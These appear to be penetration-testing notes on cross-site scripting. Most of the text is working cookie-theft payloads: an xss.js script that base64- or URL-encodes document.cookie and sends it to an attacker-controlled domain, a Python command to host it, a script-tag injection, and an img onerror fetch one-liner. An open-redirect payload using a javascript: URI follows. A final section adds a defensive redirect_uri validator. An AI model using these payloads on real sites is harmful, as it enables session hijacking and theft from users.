Hosting method:

- First create a file named xss.js with the following content:

```js
let cookie = document.cookie
let encodedCookie = btoa(cookie)
new Image().src = "http://domain/?cookie=" + encodedCookie;
```

- Host the file using Python:

```bash
python3 -m http.server 80
```

- Inject the payload:

```html
<script src="http://ownIP/xss.js"></script>
```

One-liner alternative:

- Replace domain with a domain you control:

```html
<img src="x" onerror="fetch('http://domain/cookie=?'+encodeURIComponent(document.cookie))">
```

- Note that you can use either single quotes or a backslash to escape double quotes inside double quotes. Also, if the payload goes in a URL, the plus needs to be encoded as %2b.

Possible payloads:

```html
<img src='http://192.168.45.X:9000/name'>
```

Previous code in xss.js:

```js
let cookie = document.cookie
let encodedCookie = encodeURIComponent(cookie)
fetch("http://domain/?cookie=" + encodedCookie)
```

Redirect payload here:

```
?redirect_uri=javascript:alert(1)//?x]=&redirect_uri=https://pwnbox.xyz/docs
```
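
The redirect payload above carries `redirect_uri` twice and uses a `javascript:` scheme in one copy. The following is an added example, not code from these notes, of a server-side check that rejects both conditions; `validateRedirectUri`, `ALLOWED_REDIRECTS` and the host `app.example.test` are hypothetical names chosen for illustration.

```javascript
// Added example, not code from the original notes.
// ALLOWED_REDIRECTS and validateRedirectUri are hypothetical names;
// app.example.test is a constructed placeholder host.
const ALLOWED_REDIRECTS = new Set(["https://app.example.test/callback"]);

function validateRedirectUri(queryString) {
  // getAll() exposes every copy of the parameter; get() would return only
  // the first one and hide a duplicate from the check.
  const values = new URLSearchParams(queryString).getAll("redirect_uri");
  if (values.length === 0) return { ok: false, reason: "missing" };
  if (values.length > 1) return { ok: false, reason: "duplicate" };

  let url;
  try {
    url = new URL(values[0]); // absolute URLs only; relative input throws
  } catch {
    return { ok: false, reason: "unparseable" };
  }
  // Scheme allowlist: javascript:, data: and plain http: all stop here.
  if (url.protocol !== "https:") return { ok: false, reason: "scheme" };
  if (url.username || url.password) return { ok: false, reason: "userinfo" };
  if (url.search || url.hash) return { ok: false, reason: "extra-components" };
  // Exact match on origin + path, never a prefix or substring match.
  if (!ALLOWED_REDIRECTS.has(url.origin + url.pathname)) {
    return { ok: false, reason: "not-allowlisted" };
  }
  return { ok: true, uri: url.origin + url.pathname };
}

// Constructed inputs: the payload from the notes, each half alone, a valid value.
const samples = [
  "?redirect_uri=javascript:alert(1)//?x]=&redirect_uri=https://pwnbox.xyz/docs",
  "?redirect_uri=javascript:alert(1)",
  "?redirect_uri=https://pwnbox.xyz/docs",
  "?redirect_uri=https%3A%2F%2Fapp.example.test%2Fcallback",
];
for (const s of samples) {
  console.log(JSON.stringify(validateRedirectUri(s)), "<-", s);
}
```

The redirect should be issued from the value the validator returns, not from a second read of the raw query string, so the checked value and the used value cannot differ.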